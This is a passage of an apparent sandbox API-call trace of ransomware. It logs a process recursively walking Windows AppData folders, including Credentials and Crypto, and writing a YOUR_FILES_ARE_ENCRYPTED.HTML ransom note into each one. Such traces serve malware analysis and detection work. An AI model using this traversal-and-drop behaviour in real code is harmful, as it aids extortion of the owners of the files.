cAlternateFileName="TEMPOR~1")) returned 0 [0171.025] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.025] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 64 [0171.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.026] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.028] CloseHandle (hObject=0x5f8) returned 1 [0171.028] GetProcessHeap () returned 0x270000 [0171.029] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.029] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0171.029] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow") returned 37 [0171.029] GetProcessHeap () returned 0x270000 [0171.029] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.029] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow" [0171.029] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\*" [0171.030] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.030] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.030] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.030] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.030] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 67 [0171.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\locallow\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.031] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.033] CloseHandle (hObject=0x5f8) returned 1 [0171.033] GetProcessHeap () returned 0x270000 [0171.034] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.034] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa06094d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Roaming", cAlternateFileName="")) returned 1 [0171.034] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming") returned 36 [0171.034] GetProcessHeap () returned 0x270000 [0171.034] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.034] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming" [0171.035] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*" [0171.035] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa06094d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.036] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa06094d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.036] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0171.036] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities") returned 47 [0171.036] GetProcessHeap () returned 0x270000 [0171.036] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0171.037] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities" [0171.037] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\*" [0171.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0171.037] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.037] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}", cAlternateFileName="{B85DC~1")) returned 1 [0171.037] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}") returned 86 [0171.037] GetProcessHeap () returned 0x270000 [0171.037] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0171.037] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}" [0171.037] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\*" [0171.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0171.038] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.038] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.038] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0171.038] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0171.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\{b85dca4a-5c21-4ec5-af48-a2a88cd3d1d9}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0171.039] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0171.041] CloseHandle (hObject=0x5fc) returned 1 [0171.041] GetProcessHeap () returned 0x270000 [0171.042] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0171.042] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}", cAlternateFileName="{B85DC~1")) returned 0 [0171.043] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0171.043] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0171.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600 [0171.044] WriteFile (in: hFile=0x600, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0171.046] CloseHandle (hObject=0x600) returned 1 [0171.046] GetProcessHeap () returned 0x270000 [0171.047] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0171.047] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0171.047] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft") returned 46 [0171.048] GetProcessHeap () returned 0x270000 [0171.048] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0171.048] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft" [0171.048] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*" [0171.048] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0171.051] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.051] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0171.051] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials") returned 58 [0171.051] GetProcessHeap () returned 0x270000 [0171.051] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0171.051] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials" [0171.051] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0171.051] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0171.052] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.052] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.052] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0171.052] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 88 [0171.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\credentials\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0171.053] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0171.055] CloseHandle (hObject=0x5fc) returned 1 [0171.056] GetProcessHeap () returned 0x270000 [0171.057] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0171.057] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Crypto", cAlternateFileName="")) returned 1 [0171.057] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto") returned 53 [0171.057] GetProcessHeap () returned 0x270000 [0171.057] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0171.057] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto" [0171.057] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*" [0171.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0171.058] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, 